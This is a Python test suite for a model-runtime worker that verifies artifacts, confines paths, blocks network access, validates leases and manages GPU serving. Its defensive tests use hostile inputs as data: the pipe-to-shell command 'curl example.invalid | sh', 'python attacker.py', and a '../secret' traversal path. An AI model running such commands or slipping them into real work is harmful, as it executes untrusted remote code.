610 lines
21 KiB
Python
610 lines
21 KiB
Python
from __future__ import annotations
|
|
|
|
import hashlib
|
|
import json
|
|
import socket
|
|
import uuid
|
|
from pathlib import Path
|
|
from typing import Any
|
|
|
|
import pytest
|
|
from pydantic import ValidationError
|
|
|
|
from modelforge_runtime_worker.adapters import (
|
|
QwenRerankerAdapter,
|
|
SentenceTransformersAdapter,
|
|
Siglip2Adapter,
|
|
TrOCRAdapter,
|
|
WhisperAdapter,
|
|
adapter_for,
|
|
)
|
|
from modelforge_runtime_worker.contracts import AgentRuntimeProbeLease, AgentServingJobLease
|
|
from modelforge_runtime_worker.probe import (
|
|
ProbeFailure,
|
|
child_entry,
|
|
confined,
|
|
deny_external_network,
|
|
verify_artifacts,
|
|
)
|
|
from modelforge_runtime_worker.serving import ServingEngine
|
|
from modelforge_runtime_worker.settings import RuntimeWorkerSettings
|
|
from modelforge_runtime_worker.transport import RuntimeTransport
|
|
from modelforge_runtime_worker.worker import ProbeCancelled, RuntimeWorker
|
|
|
|
|
|
class FakeTransport:
|
|
def __init__(self, lease: dict[str, Any] | None = None) -> None:
|
|
self.lease = lease
|
|
self.progress_responses: list[dict[str, Any]] = []
|
|
self.failures: list[dict[str, Any]] = []
|
|
self.completed: list[dict[str, Any]] = []
|
|
|
|
def next_probe(self, _credential: str) -> dict[str, Any] | None:
|
|
value, self.lease = self.lease, None
|
|
return value
|
|
|
|
def progress(self, _probe_id: str, _credential: str, _payload: dict[str, Any]):
|
|
return (
|
|
self.progress_responses.pop(0)
|
|
if self.progress_responses
|
|
else {"cancel_requested": False}
|
|
)
|
|
|
|
def complete(self, _probe_id: str, _credential: str, payload: dict[str, Any]):
|
|
self.completed.append(payload)
|
|
return {}
|
|
|
|
def fail(self, _probe_id: str, _credential: str, payload: dict[str, Any]):
|
|
self.failures.append(payload)
|
|
return {}
|
|
|
|
def close(self) -> None:
|
|
pass
|
|
|
|
|
|
def lease_payload() -> dict[str, Any]:
|
|
return {
|
|
"probe_id": "00000000-0000-0000-0000-000000000001",
|
|
"lease_token": "x" * 32,
|
|
"lease_expires_at": "2030-01-01T00:00:00Z",
|
|
"artifact_set_id": "00000000-0000-0000-0000-000000000002",
|
|
"revision_sha": "a" * 40,
|
|
"artifact_root": "/models",
|
|
"artifact_relative_path": "repositories/model/" + "a" * 40,
|
|
"expected_manifest": {"files": []},
|
|
"runtime_profile": {
|
|
"id": "00000000-0000-0000-0000-000000000003",
|
|
"adapter": "sentence_transformers",
|
|
"max_sequence_length": 128,
|
|
},
|
|
"runtime_environment": {
|
|
"image_digest": "sha256:" + "b" * 64,
|
|
"fingerprint": "c" * 64,
|
|
},
|
|
"probe_input": "ModelForge runtime compatibility probe",
|
|
}
|
|
|
|
|
|
def serving_lease_payload(operation: str = "load") -> dict[str, Any]:
|
|
return {
|
|
"job_id": "00000000-0000-0000-0000-000000000010",
|
|
"lease_token": "s" * 32,
|
|
"lease_expires_at": "2030-01-01T00:00:00Z",
|
|
"operation": operation,
|
|
"deployment_id": "00000000-0000-0000-0000-000000000011",
|
|
"artifact_set_id": "00000000-0000-0000-0000-000000000002",
|
|
"revision_sha": "a" * 40,
|
|
"artifact_root": "/models",
|
|
"artifact_relative_path": "repositories/model/" + "a" * 40,
|
|
"expected_manifest": {"files": []},
|
|
"runtime_profile": {
|
|
"id": "00000000-0000-0000-0000-000000000003",
|
|
"adapter": "sentence_transformers",
|
|
"max_sequence_length": 128,
|
|
"trust_remote_code": False,
|
|
"network_egress": False,
|
|
},
|
|
"runtime_environment": {
|
|
"image_digest": "sha256:" + "b" * 64,
|
|
"fingerprint": "c" * 64,
|
|
},
|
|
"embedding_space_id": "00000000-0000-0000-0000-000000000012",
|
|
"expected_dimension": 1024,
|
|
"normalize": True,
|
|
"input": ["ModelForge serving"] if operation in {"invoke", "health"} else None,
|
|
"request_id": "00000000-0000-0000-0000-000000000013",
|
|
}
|
|
|
|
|
|
def make_settings(tmp_path: Path) -> RuntimeWorkerSettings:
|
|
credential = tmp_path / "credential"
|
|
credential.write_text("credential", encoding="utf-8")
|
|
return RuntimeWorkerSettings(
|
|
credential_file=credential,
|
|
artifact_root=tmp_path / "models",
|
|
tls_verify=False,
|
|
)
|
|
|
|
|
|
def test_artifact_verification_streams_exact_digest_and_size(tmp_path: Path) -> None:
|
|
root = tmp_path / "set"
|
|
root.mkdir()
|
|
payload = b"verified-runtime-artifact"
|
|
(root / "model.safetensors").write_bytes(payload)
|
|
verify_artifacts(
|
|
root,
|
|
{
|
|
"files": [
|
|
{
|
|
"path": "model.safetensors",
|
|
"size_bytes": len(payload),
|
|
"sha256": hashlib.sha256(payload).hexdigest(),
|
|
}
|
|
]
|
|
},
|
|
)
|
|
|
|
|
|
@pytest.mark.parametrize("mutation", ["size", "digest", "missing"])
|
|
def test_artifact_verification_fails_closed(tmp_path: Path, mutation: str) -> None:
|
|
root = tmp_path / "set"
|
|
root.mkdir()
|
|
target = root / "config.json"
|
|
target.write_text("{}", encoding="utf-8")
|
|
item = {
|
|
"path": "config.json",
|
|
"size_bytes": 2,
|
|
"sha256": hashlib.sha256(b"{}").hexdigest(),
|
|
}
|
|
if mutation == "size":
|
|
item["size_bytes"] = 3
|
|
elif mutation == "digest":
|
|
item["sha256"] = "0" * 64
|
|
else:
|
|
target.unlink()
|
|
with pytest.raises(ProbeFailure):
|
|
verify_artifacts(root, {"files": [item]})
|
|
|
|
|
|
def test_path_traversal_and_symlink_escape_are_blocked(
|
|
tmp_path: Path, monkeypatch: pytest.MonkeyPatch
|
|
) -> None:
|
|
root = tmp_path / "models"
|
|
root.mkdir()
|
|
with pytest.raises(ProbeFailure, match="confined"):
|
|
confined(root, "../secret")
|
|
link = root / "link"
|
|
link.mkdir()
|
|
resolved_link = link.resolve()
|
|
original_is_symlink = Path.is_symlink
|
|
monkeypatch.setattr(
|
|
Path,
|
|
"is_symlink",
|
|
lambda value: value == resolved_link or original_is_symlink(value),
|
|
)
|
|
with pytest.raises(ProbeFailure):
|
|
confined(root, "link")
|
|
|
|
|
|
def test_offline_guard_rejects_network_connections() -> None:
|
|
with deny_external_network(), socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
|
|
with pytest.raises(ProbeFailure, match="external network"):
|
|
client.connect(("127.0.0.1", 9))
|
|
|
|
|
|
def test_typed_lease_rejects_arbitrary_command() -> None:
|
|
payload = lease_payload()
|
|
payload["arbitrary_command"] = "curl example.invalid | sh"
|
|
with pytest.raises(ValidationError):
|
|
AgentRuntimeProbeLease.model_validate(payload)
|
|
|
|
|
|
def test_typed_serving_lease_rejects_arbitrary_runtime_selection() -> None:
|
|
payload = serving_lease_payload()
|
|
payload["command"] = "python attacker.py"
|
|
with pytest.raises(ValidationError):
|
|
AgentServingJobLease.model_validate(payload)
|
|
|
|
|
|
def test_idle_poll_does_not_execute(tmp_path: Path) -> None:
|
|
transport = FakeTransport()
|
|
worker = RuntimeWorker(make_settings(tmp_path), transport)
|
|
assert worker.run_once() is False
|
|
|
|
|
|
def test_serving_transport_uses_bounded_long_poll_query(
|
|
monkeypatch: pytest.MonkeyPatch,
|
|
) -> None:
|
|
transport = RuntimeTransport("http://control-plane", timeout=30, verify=False)
|
|
captured: dict[str, str] = {}
|
|
|
|
def capture(
|
|
_method: str,
|
|
path: str,
|
|
_credential: str,
|
|
_payload: dict[str, Any] | None = None,
|
|
) -> None:
|
|
captured["path"] = path
|
|
return None
|
|
|
|
monkeypatch.setattr(transport, "_request", capture)
|
|
assert transport.next_serving_job("credential", wait_seconds=1.25) is None
|
|
assert captured["path"].endswith("wait_seconds=1.250")
|
|
transport.close()
|
|
|
|
|
|
def test_worker_normalizes_probe_failure_without_secret_or_command(tmp_path: Path) -> None:
|
|
payload = lease_payload()
|
|
payload["artifact_root"] = str(tmp_path / "models")
|
|
transport = FakeTransport(payload)
|
|
worker = RuntimeWorker(make_settings(tmp_path), transport)
|
|
assert worker.run_once() is True
|
|
assert transport.failures[0]["failure_code"] == "ARTIFACT_INCOMPLETE"
|
|
serialized = json.dumps(transport.failures)
|
|
assert "credential" not in serialized
|
|
assert "command" not in serialized
|
|
|
|
|
|
def test_cancellation_is_acknowledged_at_progress_boundary(tmp_path: Path) -> None:
|
|
payload = lease_payload()
|
|
transport = FakeTransport()
|
|
transport.progress_responses.append({"cancel_requested": True})
|
|
worker = RuntimeWorker(make_settings(tmp_path), transport)
|
|
with pytest.raises(ProbeCancelled):
|
|
worker._progress(AgentRuntimeProbeLease.model_validate(payload), "loading")
|
|
|
|
|
|
class CaptureQueue:
|
|
def __init__(self) -> None:
|
|
self.messages: list[dict[str, Any]] = []
|
|
|
|
def put(self, message: dict[str, Any]) -> None:
|
|
self.messages.append(message)
|
|
|
|
|
|
def test_adapter_registry_is_typed_and_rejects_unimplemented_runtime() -> None:
|
|
assert isinstance(adapter_for("sentence_transformers"), SentenceTransformersAdapter)
|
|
assert isinstance(adapter_for("qwen3_reranker"), QwenRerankerAdapter)
|
|
assert isinstance(adapter_for("transformers_trocr"), TrOCRAdapter)
|
|
assert isinstance(adapter_for("transformers_siglip2"), Siglip2Adapter)
|
|
assert isinstance(adapter_for("transformers_whisper"), WhisperAdapter)
|
|
with pytest.raises(ProbeFailure, match="not executable"):
|
|
adapter_for("vllm")
|
|
|
|
|
|
def test_siglip_text_item_is_not_misclassified_when_optional_image_is_null() -> None:
|
|
assert (
|
|
Siglip2Adapter.item_modality(
|
|
{"image_base64": None, "media_type": None, "text": "a blue circle"}
|
|
)
|
|
== "text"
|
|
)
|
|
assert (
|
|
Siglip2Adapter.item_modality(
|
|
{"image_base64": "cG5n", "media_type": "image/png", "text": None}
|
|
)
|
|
== "image"
|
|
)
|
|
with pytest.raises(ProbeFailure, match="no supported content"):
|
|
Siglip2Adapter.item_modality({"image_base64": None, "media_type": None, "text": " "})
|
|
|
|
|
|
def test_child_normalizes_gpu_oom_without_exception_details(
|
|
monkeypatch: pytest.MonkeyPatch,
|
|
) -> None:
|
|
queue = CaptureQueue()
|
|
|
|
def oom(_path: Path, _lease: dict[str, Any]) -> dict[str, Any]:
|
|
raise RuntimeError("CUDA out of memory: sensitive allocator details")
|
|
|
|
monkeypatch.setattr("modelforge_runtime_worker.probe.run_sentence_transformers_probe", oom)
|
|
child_entry(lease_payload(), "/models/exact", queue)
|
|
assert queue.messages[-1] == {
|
|
"type": "failure",
|
|
"code": "GPU_OOM",
|
|
"message": "RuntimeError",
|
|
}
|
|
|
|
|
|
def test_child_normalizes_unexpected_worker_crash(monkeypatch: pytest.MonkeyPatch) -> None:
|
|
queue = CaptureQueue()
|
|
|
|
def crash(_path: Path, _lease: dict[str, Any]) -> dict[str, Any]:
|
|
raise ValueError("secret should not cross process boundary")
|
|
|
|
monkeypatch.setattr("modelforge_runtime_worker.probe.run_sentence_transformers_probe", crash)
|
|
child_entry(lease_payload(), "/models/exact", queue)
|
|
assert queue.messages[-1]["code"] == "RUNTIME_CRASH"
|
|
assert queue.messages[-1]["message"] == "ValueError"
|
|
|
|
|
|
def test_unload_reclamation_failure_is_detected_without_claiming_success(
|
|
tmp_path: Path, monkeypatch: pytest.MonkeyPatch
|
|
) -> None:
|
|
worker = RuntimeWorker(make_settings(tmp_path), FakeTransport())
|
|
samples = iter(
|
|
[
|
|
{"used_vram_bytes": 500 * 1024**2},
|
|
{"used_vram_bytes": 500 * 1024**2},
|
|
]
|
|
)
|
|
times = iter([0.0, 11.0])
|
|
monkeypatch.setattr("modelforge_runtime_worker.worker.gpu_sample", lambda: next(samples))
|
|
monkeypatch.setattr("modelforge_runtime_worker.worker.time.monotonic", lambda: next(times))
|
|
after, reclaimed = worker._after_unload({"used_vram_bytes": 0})
|
|
assert after["used_vram_bytes"] == 500 * 1024**2
|
|
assert reclaimed is False
|
|
|
|
|
|
class FakeServingAdapter(SentenceTransformersAdapter):
|
|
def inspect_support(self, lease: dict[str, Any]) -> None:
|
|
assert lease["runtime_profile"]["trust_remote_code"] is False
|
|
|
|
def prepare(self) -> None:
|
|
pass
|
|
|
|
def start(self, _model_path: Path, _profile: dict[str, Any]) -> None:
|
|
self.before = {
|
|
"used_vram_bytes": 100,
|
|
"process_used_vram_bytes": 10,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
self.loaded = {
|
|
"used_vram_bytes": 300,
|
|
"process_used_vram_bytes": 210,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
self.during = self.loaded
|
|
self.load_time_ms = 200.0
|
|
self.model = object()
|
|
|
|
def invoke(self, inputs: list[str], *, input_type: str = "raw") -> dict[str, Any]:
|
|
assert input_type in {"raw", "query", "document"}
|
|
self.during = {
|
|
"used_vram_bytes": 320,
|
|
"process_used_vram_bytes": 220,
|
|
"temperature_c": 50,
|
|
"power_draw_w": 40.0,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
self.inference = {"finite": True, "dimension": 1024, "normalized": True}
|
|
return {
|
|
"vectors": [[1.0] + [0.0] * 1023 for _ in inputs],
|
|
"count": len(inputs),
|
|
"shape": [len(inputs), 1024],
|
|
"dimension": 1024,
|
|
"finite": True,
|
|
"normalized": True,
|
|
"prompt_tokens": len(inputs) * 4,
|
|
"inference_time_ms": 25.0,
|
|
}
|
|
|
|
def collect_runtime_facts(self, _lease: dict[str, Any]) -> dict[str, Any]:
|
|
return {
|
|
"offline_local_only": True,
|
|
"trust_remote_code": False,
|
|
"network_attempts": 0,
|
|
}
|
|
|
|
def stop(self) -> None:
|
|
self.model = None
|
|
|
|
def unload(self) -> None:
|
|
self.model = None
|
|
|
|
|
|
class FakeRerankerAdapter(QwenRerankerAdapter):
|
|
def inspect_support(self, lease: dict[str, Any]) -> None:
|
|
assert lease["runtime_profile"]["trust_remote_code"] is False
|
|
assert lease["runtime_profile"]["network_egress"] is False
|
|
|
|
def prepare(self) -> None:
|
|
pass
|
|
|
|
def start(self, _model_path: Path, _profile: dict[str, Any]) -> None:
|
|
self.before = {
|
|
"used_vram_bytes": 100,
|
|
"process_used_vram_bytes": 10,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
self.loaded = {
|
|
"used_vram_bytes": 300,
|
|
"process_used_vram_bytes": 210,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
self.during = self.loaded
|
|
self.load_time_ms = 200.0
|
|
self.model = object()
|
|
self.tokenizer = object()
|
|
|
|
def probe(self, _probe_input: str) -> dict[str, Any]:
|
|
self.inference = {"finite": True, "count": 1}
|
|
return {
|
|
"status": "passed",
|
|
"output_type": "ranked_scores",
|
|
"finite": True,
|
|
"count": 1,
|
|
"latency_ms": 5.0,
|
|
}
|
|
|
|
def rerank(self, _query: str, documents: list[dict[str, str]], top_n: int) -> dict[str, Any]:
|
|
self.during = {
|
|
"used_vram_bytes": 320,
|
|
"process_used_vram_bytes": 220,
|
|
"temperature_c": 50,
|
|
"power_draw_w": 40.0,
|
|
"gpu_uuid": "GPU-test",
|
|
}
|
|
ordered = list(reversed(documents))[:top_n]
|
|
return {
|
|
"results": [
|
|
{"id": document["id"], "score": 1.0 - index / 10, "rank": index + 1}
|
|
for index, document in enumerate(ordered)
|
|
],
|
|
"count": len(documents),
|
|
"top_n": top_n,
|
|
"finite": True,
|
|
"prompt_tokens": 12,
|
|
"inference_time_ms": 20.0,
|
|
"timings": {"worker_total_ms": 22.0},
|
|
}
|
|
|
|
def collect_runtime_facts(self, _lease: dict[str, Any]) -> dict[str, Any]:
|
|
return {
|
|
"offline_local_only": True,
|
|
"trust_remote_code": False,
|
|
"network_attempts": 0,
|
|
}
|
|
|
|
def unload(self) -> None:
|
|
self.model = None
|
|
self.tokenizer = None
|
|
|
|
|
|
def test_serving_engine_load_invoke_warm_reuse_and_unload(
|
|
tmp_path: Path, monkeypatch: pytest.MonkeyPatch
|
|
) -> None:
|
|
model_path = tmp_path / "repositories" / "model" / ("a" * 40)
|
|
model_path.mkdir(parents=True)
|
|
payload = serving_lease_payload("load")
|
|
payload["artifact_root"] = str(tmp_path)
|
|
monkeypatch.setattr(
|
|
"modelforge_runtime_worker.serving.adapter_for", lambda _name: FakeServingAdapter()
|
|
)
|
|
monkeypatch.setattr(
|
|
"modelforge_runtime_worker.serving.gpu_sample",
|
|
lambda: {
|
|
"used_vram_bytes": 500,
|
|
"process_used_vram_bytes": 10,
|
|
"temperature_c": 48,
|
|
"power_draw_w": 10.0,
|
|
},
|
|
)
|
|
engine = ServingEngine(tmp_path, reclaim_tolerance_bytes=0)
|
|
loaded = engine.execute(payload)
|
|
assert loaded.state == "warm" and loaded.metrics["loaded_vram_bytes"] == 300
|
|
assert engine.load_count == 1
|
|
duplicate = engine.execute(payload)
|
|
assert duplicate.result["already_resident"] is True and engine.load_count == 1
|
|
invoke = serving_lease_payload("invoke")
|
|
invoke["artifact_root"] = str(tmp_path)
|
|
result = engine.execute(invoke)
|
|
assert result.result["count"] == 1
|
|
assert len(result.result["vectors"][0]) == 1024
|
|
unload = serving_lease_payload("unload")
|
|
unload["artifact_root"] = str(tmp_path)
|
|
unloaded = engine.execute(unload)
|
|
assert unloaded.result["reclaimed"] is True
|
|
assert unloaded.metrics["after_unload_vram_bytes"] == 500
|
|
assert unloaded.metrics["after_unload_process_vram_bytes"] == 10
|
|
assert engine.state == "cold" and engine.deployment_id is None
|
|
|
|
|
|
def test_serving_engine_requires_residency_before_invoke(tmp_path: Path) -> None:
|
|
engine = ServingEngine(tmp_path, reclaim_tolerance_bytes=0)
|
|
payload = serving_lease_payload("invoke")
|
|
payload["artifact_root"] = str(tmp_path)
|
|
with pytest.raises(ProbeFailure, match="not resident"):
|
|
engine.execute(payload)
|
|
|
|
|
|
def test_serving_engine_keeps_two_exact_deployments_resident(
|
|
tmp_path: Path, monkeypatch: pytest.MonkeyPatch
|
|
) -> None:
|
|
model_path = tmp_path / "repositories" / "model" / ("a" * 40)
|
|
model_path.mkdir(parents=True)
|
|
monkeypatch.setattr(
|
|
"modelforge_runtime_worker.serving.adapter_for", lambda _name: FakeServingAdapter()
|
|
)
|
|
monkeypatch.setattr(
|
|
"modelforge_runtime_worker.serving.gpu_sample",
|
|
lambda: {
|
|
"used_vram_bytes": 500,
|
|
"process_used_vram_bytes": 10,
|
|
"temperature_c": 48,
|
|
"power_draw_w": 10.0,
|
|
},
|
|
)
|
|
engine = ServingEngine(tmp_path, reclaim_tolerance_bytes=0)
|
|
first = serving_lease_payload("load")
|
|
first["artifact_root"] = str(tmp_path)
|
|
second = {**first, "deployment_id": str(uuid.uuid4()), "job_id": str(uuid.uuid4())}
|
|
engine.execute(first)
|
|
engine.execute(second)
|
|
assert len(engine.slots) == 2
|
|
assert len(engine.state_report().residencies) == 2
|
|
invoke_first = serving_lease_payload("invoke")
|
|
invoke_first["artifact_root"] = str(tmp_path)
|
|
invoke_second = {
|
|
**invoke_first,
|
|
"deployment_id": second["deployment_id"],
|
|
"job_id": str(uuid.uuid4()),
|
|
}
|
|
assert engine.execute(invoke_first).result["count"] == 1
|
|
assert engine.execute(invoke_second).result["count"] == 1
|
|
unload_first = serving_lease_payload("unload")
|
|
unload_first["artifact_root"] = str(tmp_path)
|
|
engine.execute(unload_first)
|
|
assert len(engine.slots) == 1
|
|
assert engine.state == "warm"
|
|
|
|
|
|
def test_reranking_serving_engine_preserves_ids_and_never_returns_content(
|
|
tmp_path: Path, monkeypatch: pytest.MonkeyPatch
|
|
) -> None:
|
|
model_path = tmp_path / "repositories" / "model" / ("a" * 40)
|
|
model_path.mkdir(parents=True)
|
|
monkeypatch.setattr(
|
|
"modelforge_runtime_worker.serving.adapter_for", lambda _name: FakeRerankerAdapter()
|
|
)
|
|
engine = ServingEngine(tmp_path, reclaim_tolerance_bytes=0)
|
|
load = serving_lease_payload("load")
|
|
load.update(
|
|
{
|
|
"artifact_root": str(tmp_path),
|
|
"capability": "rag.reranking",
|
|
"embedding_space_id": None,
|
|
"expected_dimension": None,
|
|
"normalize": None,
|
|
"runtime_profile": {
|
|
**load["runtime_profile"],
|
|
"adapter": "qwen3_reranker",
|
|
},
|
|
}
|
|
)
|
|
loaded = engine.execute(load)
|
|
assert loaded.state == "warm"
|
|
invoke = serving_lease_payload("invoke")
|
|
invoke.update(
|
|
{
|
|
"artifact_root": str(tmp_path),
|
|
"capability": "rag.reranking",
|
|
"embedding_space_id": None,
|
|
"expected_dimension": None,
|
|
"normalize": None,
|
|
"input": None,
|
|
"runtime_profile": load["runtime_profile"],
|
|
"rerank_query": "query content",
|
|
"rerank_documents": [
|
|
{"id": "a", "text": "first secret body"},
|
|
{"id": "b", "text": "second secret body"},
|
|
],
|
|
"top_n": 2,
|
|
}
|
|
)
|
|
result = engine.execute(invoke)
|
|
assert [item["id"] for item in result.result["results"]] == ["b", "a"]
|
|
serialized = json.dumps(result.model_dump(mode="json"))
|
|
assert "secret body" not in serialized
|
|
assert result.runtime_facts["offline_local_only"] is True
|
|
|
|
|
|
def test_worker_state_report_contains_no_artifact_path_or_request_content(tmp_path: Path) -> None:
|
|
report = (
|
|
ServingEngine(tmp_path, reclaim_tolerance_bytes=0).state_report().model_dump(mode="json")
|
|
)
|
|
serialized = json.dumps(report)
|
|
assert report["state"] == "cold"
|
|
assert "artifact" not in serialized
|
|
assert "ModelForge serving" not in serialized
|